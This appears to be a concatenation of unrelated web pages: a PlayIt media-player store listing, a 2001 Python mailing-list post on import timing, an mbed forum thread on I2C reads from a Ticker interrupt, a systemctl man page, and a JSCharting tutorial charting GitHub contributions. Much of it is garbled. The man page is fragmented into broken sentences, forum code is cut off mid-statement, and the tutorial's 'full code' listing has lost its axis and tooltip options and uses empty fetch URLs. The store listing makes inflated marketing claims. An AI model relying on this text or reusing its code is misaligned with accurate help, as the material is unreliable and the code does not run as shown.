In Windows Forms, the DateTimePicker control is used to select and display the date/time with a specific format in your form. The FlowLayoutPanel class is used to represent windows DateTimePicker control and also provide different types of properties, methods, and events. It is defined under System.Windows.Forms namespace. You can create two different types of DateTimePicker, as a drop-down list with a date represented in the text, or as a calendar which appears when you click on the down-arrow next to the given list. In C#, you can create a DateTimePicker in the windows form by using two different ways: 1. Design-Time: It is the easiest way to create a DateTimePicker control to modify DateTimePicker according to your requirement. Output: 2. Run-Time: It is a little bit trickier than the above method. In this method, you can create a DateTimePicker programmatically with the help of syntax provided by the DateTimePicker class. The following steps show how to set the create DateTimePicker dynamically: - Step 1: Create a DateTimePicker using the DateTimePicker() constructor is provided by the DateTimePicker class. // Creating a DateTimePicker DateTimePicker d = new DateTimePicker(); - Step 2: After creating a DateTimePicker, set the properties of the DateTimePicker provided by the DateTimePicker class. // Setting the location of the DateTimePicker d.Location = new Point(360, 162); // Setting the size of the DateTimePicker d.Size = new Size(292, 26); // Setting the maximum date of the DateTimePicker d.MaxDate = new DateTime(2500, 12, 20); // Setting the minimum date of the DateTimePicker d.MinDate = new DateTime(1753, 1, 1); // Setting the format of the DateTimePicker d.Format = DateTimePickerFormat.Long; // Setting the name of the DateTimePicker d.Name = "MyPicker"; // Setting the font of the DateTimePicker d.Font = new Font("Comic Sans MS", 12); // Setting the visibility of the DateTimePicker d.Visible = true; // Setting the value of the DateTimePicker d.Value = DateTime.Today; - Step 3: And last add this DateTimePicker control to the form and also add other controls on the DateTimePicker using the following statements: // Adding this control // to the form this.Controls.Add(d); Example:chevron_rightfilter_none Output: Constructor Fields Properties Recommended Posts: - How to set a Check Box in the DateTimePicker in C#? - How to set the Visibility of DateTimePicker in C#? - How to set the Size of the DateTimePicker in C#? - How to set the Format of the DateTimePicker in C#? - How to set Maximum Date in the DateTimePicker in C#? - How to set Minimum Date in the DateTimePicker in C#? - How to set the Font of the DateTimePicker in C#? - How to set the Name of the DateTimePicker in C#? - How to set the Location of the DateTimePicker in C#? - How to display Current Date/Time in the DateTimePicker in C#? - How to set Up and Down Button in DateTimePicker in C#? - C# | FlowLayoutPanel Class - C# | ListBox Class - C# | GroupBox Class - C# | NumericUpDown Class - C# | MaskedTextBox Class - C# | RichTextBox Class - C# | ToolTip.
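The example block above does not survive extraction, so here is a hedged, self-contained sketch that simply combines the three run-time steps into one form; the class name MyForm and the Main entry point are illustrative additions rather than part of the original article.

using System;
using System.Drawing;
using System.Windows.Forms;

public class MyForm : Form
{
    public MyForm()
    {
        // Step 1: create the DateTimePicker
        DateTimePicker d = new DateTimePicker();

        // Step 2: set its properties
        d.Location = new Point(360, 162);
        d.Size = new Size(292, 26);
        d.MinDate = new DateTime(1753, 1, 1);
        d.MaxDate = new DateTime(2500, 12, 20);
        d.Format = DateTimePickerFormat.Long;
        d.Name = "MyPicker";
        d.Font = new Font("Comic Sans MS", 12);
        d.Visible = true;
        d.Value = DateTime.Today;

        // Step 3: add the control to the form
        this.Controls.Add(d);
    }

    [STAThread]
    static void Main()
    {
        Application.Run(new MyForm());
    }
}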
https://www.geeksforgeeks.org/c-sharp-datetimepicker-class/
CC-MAIN-2020-40
refinedweb
484
56.96
I am having trouble with an array. I have to enter some food items and their calorie values and then, when finished, I have to re-enter the food item and then search the array to output its calorie value. My problem is how do I search an array. Here is what I have so far:

#include <iostream>
#include <string>
using namespace std;

int main()
{
    string food[100];
    string searchvalue;
    int calories[100];
    int x = -1;
    do
    {
        x++;
        cout << "Enter a menu item (enter 'done' when finished): ";
        getline(cin, food[x]);
        if (food[x] != "done")
        {
            cout << "Enter the number of calories: ";
            cin >> calories[x];
            cin.ignore();
        }
    } while (food[x] != "done");

    cout << '\n' << "*** DATA ENTRY FINISHED ***" << endl;

    do
    {
        for (
        cout << "Enter a product to look up: ";
        getline(cin, food[x]);
        if (food[x] != "done")
        {
            cout << food[x] << " has " << calories[x] << " calories." << endl;
        }
    } while (food[x] != "done");
}
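One way to make the lookup work is sketched below; this is an assumption about the intent rather than the assignment's required answer. The idea is to keep a count of how many items were entered, read the query into its own string instead of overwriting food[x], and compare the query against each stored name in a plain for loop.

#include <iostream>
#include <string>
using namespace std;

int main()
{
    string food[100];
    int calories[100];
    int count = 0;
    string name;

    cout << "Enter a menu item (enter 'done' when finished): ";
    while (getline(cin, name) && name != "done" && count < 100)
    {
        cout << "Enter the number of calories: ";
        cin >> calories[count];
        cin.ignore();
        food[count++] = name;
        cout << "Enter a menu item (enter 'done' when finished): ";
    }

    cout << '\n' << "*** DATA ENTRY FINISHED ***" << endl;

    string query;
    cout << "Enter a product to look up: ";
    while (getline(cin, query) && query != "done")
    {
        bool found = false;
        for (int i = 0; i < count; i++)          // search only the filled part of the array
        {
            if (food[i] == query)
            {
                cout << food[i] << " has " << calories[i] << " calories." << endl;
                found = true;
                break;
            }
        }
        if (!found)
            cout << query << " was not found." << endl;
        cout << "Enter a product to look up: ";
    }
}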
https://www.daniweb.com/programming/software-development/threads/277893/array-help
CC-MAIN-2018-05
refinedweb
145
78.28
Updated for Xcode 12.0 Although using @Published is the easiest way to control state updates, you can also do it by hand if you need something specific. For example, you might want the view to refresh only if you’re happy with the values you’ve been given. Using this approach takes three steps: importing the Combine framework, adding a publisher, then using the publisher. Publishers are Combine’s way of announcing changes to whatever is watching, which in the case of SwiftUI is zero or more views. Here’s an example in code: import Combine import SwiftUI class UserAuthentication: ObservableObject { let objectWillChange = ObservableObjectPublisher() var username = "" { willSet { objectWillChange.send() } } } Let’s break down the code, to make it easier to understand. First, we have this: let objectWillChange = ObservableObjectPublisher() That creates an objectWillChange property as an instance of ObservableObjetPublisher. This comes from the Combine framework, which is why you need to add import Combine to make your code compile. The job of an observable object publisher is simple: whenever we want to tell the world that our object has changed, we ask the publisher to do it for us. Second, we have a willSet property observer attached to the username property of UserAuthentication so that we can run code whenever that value changes. In our example code, we call objectWillChange.send() whenever username changes, which is what tells the objectWillChange publisher to put out the news that our data has changed so that any subscribed views can refresh. As our UserAuthentication class conforms to ObservableObject, we can use it just like any other @ObservedObject property. So, we might use it like this to display the user’s entry as they type, like this: struct ContentView: View { @ObservedObject var settings = UserAuthentication() var body: some View { VStack { TextField("Username", text: $settings.username) .textFieldStyle(RoundedBorderTextFieldStyle()) Text("Your username is: \(settings.username)") } } } Note: SwiftUI actually provides us with a default objectWillChange property, but it doesn’t actually work in the current beta. So, it’s important to declare your own with the same name. Sponsor Hacking with Swift and reach the world's largest Swift community! Link copied to your pasteboard.
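For contrast, the same class written with @Published (which the article notes is the easier route) is shown below; the manual objectWillChange approach above is worth the extra code only when you want to decide, per change, whether to publish at all.

import SwiftUI

// Equivalent class using @Published: the objectWillChange notification
// is synthesized automatically before every change to username.
class UserAuthentication: ObservableObject {
    @Published var username = ""
}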
https://www.hackingwithswift.com/quick-start/swiftui/how-to-send-state-updates-manually-using-objectwillchange
CC-MAIN-2020-29
refinedweb
357
54.22
By Holger Krekel, who also wrote (some parts of) Tox, pypy, devpi Equivalent to unittest and nose, highly customizable, with an excellent API. Still actively maintained, and well documented. Installation: pip install pytest --duration=10 -x(ou --maxfail=n) --pdb --pastebin=failed --showlocals --tb=long @pytest.mark.functional py.test -k test_fooby path: py.test tests/bar/by module: py.test test_baz.pyby mark: py.test -m functionalou py.test -m "not functional" There's more examples on this page. Many many more examples.There's more examples on this page. Many many more examples. def test_eq_dict(self): > assert {'a': 0, 'b': 1, 'c': 0} == {'a': 0, 'b': 2, 'd': 0} E Depencendy injection using fixtures, instead of (setUp|tearDown)(function|class|module|package) hocus pocushocus pocus def test_view(rf, settings): settings.LANGUAGE_CODE = 'fr' request = rf.get('/') response = home_view(request) assert response.status_code == 302 Write the test once, run it with multiple inputs From now on, I'm only writing one test. The one.From now on, I'm only writing one test. The one. @pytest.mark.parametrize(("input", "expected"), [("3+5", 8), ("2+4", 6)]) def test_eval(input, expected): assert eval(input) == expected Globally, in the pytest.ini file: mainly to (optionnally) declare marks and default parameters --reuse-db is the real deal--reuse-db is the real deal [pytest] addopts = --reuse-db --tb=native python_files=test*.py markers = es_tests: mark a test as an elasticsearch test. Locally, for the current folder and children: declare fixtures, plugins, hooks Ugly. But easy.Ugly. But easy. import pytest, os def pytest_configure(): # Shortcut to using DJANGO_SETTINGS_MODULE=... py.test os.environ['DJANGO_SETTINGS_MODULE'] = 'settings_test' # There's a lot of python path hackery done in our manage.py import manage # noqa There's many included plugins, but also community plugins: --create-db, fixtures (rf, client, admin_client...) --cov myproj tests/ --lf -n NUM I confess. I have a sweet tooth. --reuse-db --create-db Good for my mental healthGood for my mental health [pytest] addopts = --reuse-db @pytest.mark.django_db def test_with_db(self): # function/method @pytest.mark.django_db class TestFoo(TestCase): # class Anyway, who needs a DB nowadays, right?Anyway, who needs a DB nowadays, right? pytestmark = pytest.mark.django_db # module Use simple asserts No camelCase, eg self.assertEqual assert 1 == 2vs self.assertEqual(1, 2) assert Truevs self.assertTrue(True) assert not Nonevs self.assertIsNotNone(None) self.assertAbstractSingletonProxyFactoryBean. Just joking. Or am I? Why not take advantage of something that Naming is hard. vs + test No dependency injection (and not parametrization) for nose classes But we can still use the autouse fixtures (fixtures on steroids) No (data) fixture bundling ( django-nose feature), so slower test runs, but Django 1.8 test case data setup and possibility to run Travis builds in parallelNo big deal. 248 It's going to take some time find . -name test* | wc -l 472 Wow, a lot of time ag "class Test" | wc -l 3626 Oops. ag "def test_" | wc -l 6210 Switching is hard, let's go shopping. ag "self.assert|ok_|eq_" | wc -l py.test versus Nice eh? I told you so. REUSE_DB=1 python manage.py test --noinput --logging-clear-handlers --with-id Added @pytest.mark.django_db on our base TestCase Added pytestmark = pytest.mark.django_db in 35 files that needed it I'm still hoping I'll be able to use this feature one day.I'm still hoping I'll be able to use this feature one day. 
def pytest_collection_modifyitems(items): for item in items: item.keywords['django_db'] = pytest.mark.django_db Missing calls to super() in the (setUp|tearDown)(class), leading to code/data leaks in the following tests. Ugly PYTHONPATH hacks in the manage.py file. I puked in my mouth.I puked in my mouth. import manage.py @pytest.fixture(autouse=True, scope='session') def _load_testapp(): installed_apps = getattr(settings, 'INSTALLED_APPS') setattr(settings, 'INSTALLED_APPS', installed_apps + extra_apps) django.db.models.loading.cache.loaded = False tox randomizes the PYTHONHASHSEED by default on each run. And suddenly you realize your tests were expecting the dicts to be ordered! Need to fix tests: With py.test, tox and travis, it's a piece of cake From more than 50 minutes down to less than 20I know 20 minutes is slow. But it's LESS slow. pip install pytest && py.test learn py.test: slides: more excuses!
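To tie the fragments above together, here is a hedged sketch of a conftest.py fixture combined with parametrization. The user model, URL and status codes are made-up illustrations, and the db and client fixtures come from the pytest-django plugin mentioned earlier.

# conftest.py -- fixtures declared here are injected into tests by argument name
import pytest

@pytest.fixture
def user(db):                                   # 'db' is provided by pytest-django
    from django.contrib.auth.models import User
    return User.objects.create_user("alice", password="s3cret")

# test_login.py
import pytest

@pytest.mark.parametrize(("password", "expected"), [
    ("s3cret", 302),    # good credentials redirect
    ("wrong",  200),    # bad credentials re-render the form
])
def test_login(client, user, password, expected):
    response = client.post("/login/", {"username": "alice", "password": password})
    assert response.status_code == expected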
https://agopian.info/presentations/2015_06_djangocon_europe/?full
CC-MAIN-2022-40
refinedweb
718
61.73
CodePlexProject Hosting for Open Source Software hello, I am having a problem with blogengine on my website. After I install it everything works perfect for a few days and then somehow after a few days it is like the CSS does not want to load and I am also no longer able to see the posts in the admin section. I have to place a backup back to my hosting and delete and create a new database, also place a backup back into the database and it works again for like 3 days and then it does the same. For example right now it is broken again for me: Does anyone know why this keeps happening? I use the latest version by the automatic Microsoft web app function. Looks like you have some problem with MediaElementPlayer extension conflicting with jQuery. Try to disable MediaElementPlayer and see if it will help. Thank you for the reply, I have disabled the MediaElementPlayer but it still will not load tit correctly somehow. Just to edit it also does not show anything in the admin panel I did make a screenshot: And not sure if it helps I use MSSQL 2008 database, it is really strange because it works good every time for 3 days and then it does this and not sure why. *EDIT* I removed all posts except a very basic hello one, but that does not solve it either and I disabled all extensions now. Something must be really weird because I can load the theme like this: Another thing you can do is in "advanced" settings uncheck http compression and trim stylesheets. Did also not seem to happen, when I disable it and then save it is like the database doesnt update, when I go back to the page it will show it enabled again. Well I removed everything and I started from scratch so I will see if it keeps working now. ;) Thanks anyway for all your help! I will post if it does it again ^^ It broke again after 1 day: Is there maybe something wrong with the MSSQL connection? or is it really a style-sheet problem, because I notice it doesnt wane update anything in control panel so that must mean it is not updating the database. Not really sure what is wrong because my forum also does run on another MSSQL database and that has no problem. Well I will make a test blog in MySQL to see if that is any better. Really odd. I doubted it is database issue, I'd try to upgrade to latest development build that uses .net 4.0. Were could I download this? I checked the website and under planned it does not show anything. Is there a special place? Sorry maybe I am just blind :) *edit* Never mind I found it (^.^) thanks I am going to try this out directly. I'm having the same problem--most of the admin pages are not listing their contents, including Posts, Comments, Users, etc. It appears to be related to a javascript error that's getting thrown when those pages load, Uncaught TypeError: Object [object Object] has no method 'setTemplateURL' This same exception happens in different places for different pages; for the Posts management page the top of the stacktrace is at /Scripts/jquery-1.5.1.min.js:16 I tried manually including a <script> reference to every javascript file on the site, and that didn't fix it. Could it have something to do with script handlers or something in the 4.0 web.config? I am running the site otherwise successfully, using BlogEngine.NET 2.0.0.36 on ASP.NET 4.0. I did NOT recompile the BlogEngine Core 3.5 DLL to 4.0, though like I said, the rest of the site has been running correctly. I also experienced the behavior where it worked correctly for a few days and then stopped. 
It is working incorrectly consistently across two development environments (Windows 7 Ultimate + IIS7.5, Windows 7 Professional + IIS 7.5) and one production environment (EC2 Windows Server 2008 R2 + IIS7.5) I have been playing around with your latest release (34ca9fe0c061) but I cannot get it to work, I keep getting stuck at a error, I am not really a expert on coding itself :) not sure if you can see what it means? I left it on my site it has a bunch of more information to much to post here. 3: using System.Data; Line 4: Line 5: using BlogEngine.Core; Line 6: using BlogEngine.Core.Web.Controls; Line 7: using BlogEngine.Core.Web.Extensions; Line 3: using System.Data; Line 4: Line 5: using BlogEngine.Core; Line 6: using BlogEngine.Core.Web.Controls; Line 7: using BlogEngine.Core.Web.Extensions; Source File: wwwroot\App_Code\Extensions\BBCode.cs Line: 5 I found out that the issue is somewhere in the SQLServer.NET_4.0_Web.Config that you need to use for MSSQL, if you use the default xml database Web.Config the blog runs perfect however if I swap to the MSSQL database and use the provided SQLServer.NET_4.0_Web.Config above (i change it to Web.Config) it will provide a error. *edit* Also tried to rebuild the project then it does give another erro when using mssql: Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately. Compiler Error Message: CS0234: The type or namespace name 'Html' does not exist in the namespace 'System.Web.WebPages' (are you missing an assembly reference?) Source Error: Line 3: using System.Linq; Line 4: using System.Web; Line 5: using System.Web.WebPages.Html; Line 6: using System.Text.RegularExpressions; Line 7: using System.Web.UI; Line 3: using System.Linq; Line 4: using System.Web; Line 5: using System.Web.WebPages.Html; Line 6: using System.Text.RegularExpressions; Line 7: using System.Web.UI; Source File: wwwroot\App_Code\Helpers\RazorHelpers.cs Line: 5 Web.config for XML and MSSql should be almost identical, only default providers changed from XML to SQL in 3 places. You can use XML config if it works for you and just manually change default providers from XML to DB. Razor error is because you don't have web pages installed on your server (or workstation). It usually installed into global cache with MVC 3 or Webmatrix. If not, you need copy all DLLs from downloaded /lib/Razor folder into web site's /bin. I was curious about something, are the usernames and passwords stored in a MSSQL database (if you use this) or still in a XML file? Update on my problem (again, same symptoms, probably different cause:) While tweaking my project, I had added some additional .js files to /Scripts/ (for jQuery UI.) Apparently, somewhere along the line, BlogEngine scans the /Scripts folder and automatically adds each script to each page via the script handler (js.axd). The scripts I added, which I did not intend to add to the admin pages, got added anyways and caused a collision somewhere along the line. I moved my scripts (different version of jquery and jquery UI) to a /Scripts-Custom folder instead of /Scripts and now it all works as expected. Script references are added by the ScriptModule.. See web.config entry <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.
http://blogengine.codeplex.com/discussions/260663
CC-MAIN-2017-22
refinedweb
1,245
65.73
package Carp; { use 5.006; } use strict; use warnings; BEGIN { # Very old versions of warnings.pm load Carp. This can go wrong due # to the circular dependency. If warnings is invoked before Carp, # then warnings starts by loading Carp, then Carp (above) tries to # invoke warnings, and gets nothing because warnings is in the process # of loading and hasn't defined its import method yet. If we were # only turning on warnings ("use warnings" above) this wouldn't be too # bad, because Carp would just gets the state of the -w switch and so # might not get some warnings that it wanted. The real problem is # that we then want to turn off Unicode warnings, but "no warnings # 'utf8'" won't be effective if we're in this circular-dependency # situation. So, if warnings.pm is an affected version, we turn # off all warnings ourselves by directly setting ${^WARNING_BITS}. # On unaffected versions, we turn off just Unicode warnings, via # the proper API. if(!defined($warnings::VERSION) || eval($warnings::VERSION) < 1.06) { ${^WARNING_BITS} = ""; } else { "warnings"->unimport("utf8"); } } sub _fetch_sub { # fetch sub without autovivifying my($pack, $sub) = @_; $pack .= '::'; # only works with top-level packages return unless exists($::{$pack}); for ($::{$pack}) { return unless ref \$_ eq 'GLOB' && *$_{HASH} && exists $$_{$sub}; for ($$_{$sub}) { return ref \$_ eq 'GLOB' ? *$_{CODE} : undef } } } # UTF8_REGEXP_PROBLEM is a compile-time constant indicating whether Carp # must avoid applying a regular expression to an upgraded (is_utf8) # string. There are multiple problems, on different Perl versions, # that require this to be avoided. All versions prior to 5.13.8 will # load utf8_heavy.pl for the swash system, even if the regexp doesn't # use character classes. Perl 5.6 and Perls [5.11.2, 5.13.11) exhibit # specific problems when Carp is being invoked in the aftermath of a # syntax error. BEGIN { if("$]" < 5.013011) { *UTF8_REGEXP_PROBLEM = sub () { 1 }; } else { *UTF8_REGEXP_PROBLEM = sub () { 0 }; } } # is_utf8() is essentially the utf8::is_utf8() function, which indicates # whether a string is represented in the upgraded form (using UTF-8 # internally). As utf8::is_utf8() is only available from Perl 5.8 # onwards, extra effort is required here to make it work on Perl 5.6. BEGIN { if(defined(my $sub = _fetch_sub utf8 => 'is_utf8')) { *is_utf8 = $sub; } else { # black magic for perl 5.6 *is_utf8 = sub { unpack("C", "\xaa".$_[0]) != 170 }; } } # The downgrade() function defined here is to be used for attempts to # downgrade where it is acceptable to fail. It must be called with a # second argument that is a true value. BEGIN { if(defined(my $sub = _fetch_sub utf8 => 'downgrade')) { *downgrade = \&{"utf8::downgrade"}; } else { *downgrade = sub { my $= 5.007_003 ? eval(q(sub ($) { my $u = utf8::native_to_unicode($_[0]); $u >= 0x20 && $u <= 0x7e; })) : ord("A") == 65 ? sub ($) { $_[0] >= 0x20 && $_[0] <= 0x7e } : sub ($) { # Early EBCDIC # 3 EBCDIC code pages supported then; all controls but one # are the code points below SPACE. The other one is 0x5F on # POSIX-BC; FF on the other two. # FIXME: there are plenty of unprintable codepoints other # than those that this code and the comment above identifies # as "controls". $_[0] >= ord(" ") && $_[0] <= 0xff && $_[0] != (ord ("^") == 106 ? 
0x5f : 0xff); } ; } sub _univ_mod_loaded { return 0 unless exists($::{"UNIVERSAL::"}); for ($::{"UNIVERSAL::"}) { return 0 unless ref \$_ eq "GLOB" && *$_{HASH} && exists $$_{"$_[0]::"}; for ($$_{"$_[0]::"}) { return 0 unless ref \$_ eq "GLOB" && *$_{HASH} && exists $$_{"VERSION"}; for ($$_{"VERSION"}) { return 0 unless ref \$_ eq "GLOB"; return ${*$_{SCALAR}}; } } } } # _maybe_isa() is usually the UNIVERSAL::isa function. We have to avoid # the latter if the UNIVERSAL::isa module has been loaded, to avoid infi- # nite recursion; in that case _maybe_isa simply returns true. my $isa; BEGIN { if (_univ_mod_loaded('isa')) { *_maybe_isa = sub { 1 } } else { # Since we have already done the check, record $isa for use below # when defining _StrVal. *_maybe_isa = $isa = _fetch_sub(UNIVERSAL => "isa"); } } # We need an overload::StrVal or equivalent function, but we must avoid # loading any modules on demand, as Carp is used from __DIE__ handlers and # may be invoked after a syntax error. # We can copy recent implementations of overload::StrVal and use # overloading.pm, which is the fastest implementation, so long as # overloading is available. If it is not available, we use our own pure- # Perl StrVal. We never actually use overload::StrVal, for various rea- # sons described below. # overload versions are as follows: # undef-1.00 (up to perl 5.8.0) uses bless (avoid!) # 1.01-1.17 (perl 5.8.1 to 5.14) uses Scalar::Util # 1.18+ (perl 5.16+) uses overloading # The ancient 'bless' implementation (that inspires our pure-Perl version) # blesses unblessed references and must be avoided. Those using # Scalar::Util use refaddr, possibly the pure-Perl implementation, which # has the same blessing bug, and must be avoided. Also, Scalar::Util is # loaded on demand. Since we avoid the Scalar::Util implementations, we # end up having to implement our own overloading.pm-based version for perl # 5.10.1 to 5.14. Since it also works just as well in more recent ver- # sions, we use it there, too. BEGIN { if (eval { require "overloading.pm" }) { *_StrVal = eval 'sub { no overloading; "$_[0]" }' } else { # Work around the UNIVERSAL::can/isa modules to avoid recursion. # _mycan is either UNIVERSAL::can, or, in the presence of an # override, overload::mycan. *_mycan = _univ_mod_loaded('can') ? do { require "overload.pm"; _fetch_sub overload => 'mycan' } : \&UNIVERSAL::can; # _blessed is either UNIVERAL::isa(...), or, in the presence of an # override, a hideous, but fairly reliable, workaround. *_blessed = $isa ? sub { &$isa($_[0], "UNIVERSAL") } : sub { my $= 5.015002 || ("$]" >= 5.014002 && "$]" < 5.015) || ("$]" >= 5.012005 && "$]" < 5.013)) { *CALLER_OVERRIDE_CHECK_OK = sub () { 1 }; } else { *CALLER_OVERRIDE_CHECK_OK = sub () { 0 }; } } sub caller_info { my $i = shift(@_) + 1; my %call_info; my $cgc = _cgc(); { # Some things override caller() but forget to implement the # @DB::args part of it, which we need. We check for this by # pre-populating @DB::args with a sentinel which no-one else # has the address of, so that we can detect whether @DB::args # has been properly populated. However, on earlier versions # of perl this check tickles a bug in CORE::caller() which # leaks memory. So we only check on fixed perls. @DB::args = \$i if CALLER_OVERRIDE_CHECK_OK; package DB; @call_info{ qw(pack file line sub has_args wantarray evaltext is_require) } = $cgc ? 
$cgc->($i) : caller($i); } unless ( defined $call_info{file} ) { return (); } my $sub_name = Carp::get_subname( \%call_info ); if ( $call_info{has_args} ) { # Guard our serialization of the stack from stack refcounting bugs # NOTE this is NOT a complete solution, we cannot 100% guard against # these bugs. However in many cases Perl *is* capable of detecting # them and throws an error when it does. Unfortunately serializing # the arguments on the stack is a perfect way of finding these bugs, # even when they would not affect normal program flow that did not # poke around inside the stack. Inside of Carp.pm it makes little # sense reporting these bugs, as Carp's job is to report the callers # errors, not the ones it might happen to tickle while doing so. # See: # and: # for more details and discussion. - Yves my @args = map { my $arg; local $@= $@; eval { $arg = $_; 1; } or do { $. Carp gives two ways to control this. =over 4 =item 1. For objects, a method, C<CARP_TRACE>, will be called, if it exists. If this method doesn't exist, or it recurses into C<Carp>, or it otherwise throws an exception, this is skipped, and Carp moves on to the next option, otherwise checking stops and the string returned is used. It is recommended that the object's type is part of the string to make debugging easier. =item 2. For any type of reference, C<$Carp::RefArgFormatter> is checked (see below). This variable is expected to be a code reference, and the current parameter is passed in. If this function doesn't exist (the variable is undef), or it recurses into C<Carp>, or it otherwise throws an exception, this is skipped, and Carp moves on to the next option, otherwise checking stops and the string returned is used. =item 3. Otherwise, if neither C<CARP_TRACE> nor C<$Carp::RefArgFormatter> is available, stringify the value ignoring any overloading. =back =head1 GLOBAL VARIABLES =head2 $Carp::MaxEvalLen This variable determines how many characters of a string-eval are to be shown in the output. Use a value of C<0> to show all text. Defaults to C<0>. =head2 $Carp::MaxArgLen This variable determines how many characters of each argument to a function to print. Use a value of C<0> to show the full length of the argument. Defaults to C<64>. =head2 $Carp::MaxArgNums This variable determines how many arguments to each function to show. Use a false value to show all arguments to a function call. To suppress all arguments, use C<-1> or C<'0 but true'>. Defaults to C<8>. =head2 $Carp::Verbose This variable makes C<carp()> and C<croak()> generate stack backtraces just like C<cluck()> and C<confess()>. This is how C<use Carp 'verbose'> is implemented internally. Defaults to C<0>. =head2 $Carp::RefArgFormatter This variable sets a general argument formatter to display references. Plain scalars and objects that implement C<CARP_TRACE> will not go through this formatter. Calling C<Carp> from within this function is not supported. local $Carp::RefArgFormatter = sub { require Data::Dumper; Data::Dumper::Dump($_[0]); # not necessarily safe }; =head2 @CARP_NOT This variable, I<in your package>, says which packages are I<not> to be considered as the location of an error. The C<carp()> and C<Carp> report the error as coming from a caller not in C<My::Carping::Package>, nor from C<My::Friendly::Caller>. Also read the L</DESCRIPTION> section above, about how C<Carp> decides where the error is reported from. Use C<@CARP_NOT>, instead of C<$Carp::CarpLevel>. Overrides C<Carp>'s use of C<@ISA>. 
=head2 %Carp::Internal This says what packages are internal to Perl. C.) =head2 %Carp::CarpInternal This says which packages are internal to Perl's warning system. For generating a full stack backtrace this is the same as being internal to Perl, the stack backtrace will not start inside packages that are listed in C<%Carp::CarpInternal>. But it is slightly different for the summary message generated by C<carp> or C<croak>. There errors will not be reported on any lines that are calling packages in C<%Carp::CarpInternal>. For example C<Carp> itself is listed in C<%Carp::CarpInternal>. Therefore the full stack backtrace from C<confess> will not start inside of C<Carp>, and the short message from calling C<croak> is not placed on the line where C<croak> was called. =head2 $Carp::CarpLevel This variable determines how many additional call frames are to be skipped that would not otherwise be when reporting where an error occurred on a call to one of C<Carp> goes all of the way through the call stack, realizes that something is wrong, and then generates a full stack backtrace. If they are unlucky then the error is reported from somewhere misleading very high in the call stack. Therefore it is best to avoid C<$Carp::CarpLevel>. Instead use C<@CARP_NOT>, C<%Carp::Internal> and C<%Carp::CarpInternal>. Defaults to C<0>. =head1 BUGS The Carp routines don't handle exception objects currently. If called with a first argument that is a reference, they simply call die() or warn(), as appropriate. =head1 SEE ALSO L<Carp::Always>, L<Carp::Clan> =head1 CONTRIBUTING L<Carp> is maintained by the perl 5 porters as part of the core perl 5 version control repository. Please see the L<perlhack> perldoc for how to submit patches and contribute to it. =head1 AUTHOR The Carp module first appeared in Larry Wall's perl 5.000 distribution. Since then it has been modified by several of the perl 5 porters. Andrew Main (Zefram) <zefram@fysh.org> divested Carp into an independent distribution. =head1 COPYRIGHT Copyright (C) 1994-2013 Larry Wall Copyright (C) 2011, 2012, 2013 Andrew Main (Zefram) <zefram@fysh.org> =head1 LICENSE This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
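A minimal usage sketch may make the "report from the caller" behaviour described above concrete; the module name and validation rule are invented for illustration.

use strict;
use warnings;

package My::Module;
use Carp;

sub set_count {
    my ($count) = @_;
    # croak() attributes the error to the line that called set_count(),
    # not to this line inside My::Module (unlike die()).
    croak "count must be a non-negative integer"
        unless defined $count && $count =~ /^\d+$/;
    # carp() is the warning-level counterpart (compare warn()).
    carp "count is suspiciously large" if $count > 1_000_000;
    return $count;
}

package main;

My::Module::set_count(-1);   # the fatal message points at this line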
https://web-stage.metacpan.org/dist/Carp/source/lib/Carp.pm
CC-MAIN-2021-31
refinedweb
2,022
65.62
Bugtraq mailing list archives version I was using, as xlock does not seem to contain version information in the binary and I don't have the original source. The overflow is in the -name parameter, and it is fixed in xlockmore-4.01, available on sunsite in /pub/Linux/X11/screensavers/xlockmore-4.01.tgz . Other platforms have not been checked for this, and while this is an older version of xlock, many systems seem to come preloaded with this version. Also, xlock does not need to be suid root unless it is running on a machine with shadowed passwords, so another possible fix it chmod u-s xlock. /* x86 XLOCK overflow exploit by cesaro () 0wned org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit <optional_offset> Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = ""; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } By Date By Thread
http://seclists.org/bugtraq/1997/Apr/113
CC-MAIN-2014-15
refinedweb
276
51.07
wctype.h - wide-character classification and mapping utilities #include <wctype.h> The <wctype.h> header defines the following data types through - wint_t - As described in <wchar.h>. - wctrans_t A scalar type that can hold values which represent locale-specific character mappings.A scalar type that can hold values which represent locale-specific character mappings. - wctype_t - As described in <wchar.h>. The <wctype.h> header declares the following as functions and may also define them as macros. Function prototypes must be provided for use with an ISO C compiler. int iswalnum(wint_t); int iswalpha *); <wctype.h> defines the following macro name: - WEOF - Constant expression of type wint_t that is returned by several MSE functions to indicate end-of-file. For all functions described in this header that accept an argument of type wint_t, the value will be representable as a wchar_t or will equal the value of WEOF. If this argument has any other value, the behaviour is undefined. The behaviour of these functions is affected by the LC_CTYPE category of the current locale. Inclusion of the <wctype.h> header may make visible all symbols from the headers <ctype.h>, <stdio.h>, <stdarg.h>, <stdlib.h>, <string.h>, <stddef.h> <time.h>. and <wchar.h>. None. None. iswalnum(), iswalpha(), iswcntrl(), iswctype(), iswdigit(), iswgraph(), iswlower(), iswprint(), iswpunct(), iswspace(), iswupper(), iswxdigit(), setlocale(), towctrans(), towlower(), towupper(), wctrans(), wctype(), <locale.h>. <wchar.h>.
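A short sketch exercising a few of the declared functions follows; since their behaviour depends on LC_CTYPE, the program first switches to the environment's locale. The chosen character and the category names ("alnum", "toupper") are only examples.

#include <locale.h>
#include <stdio.h>
#include <wchar.h>
#include <wctype.h>

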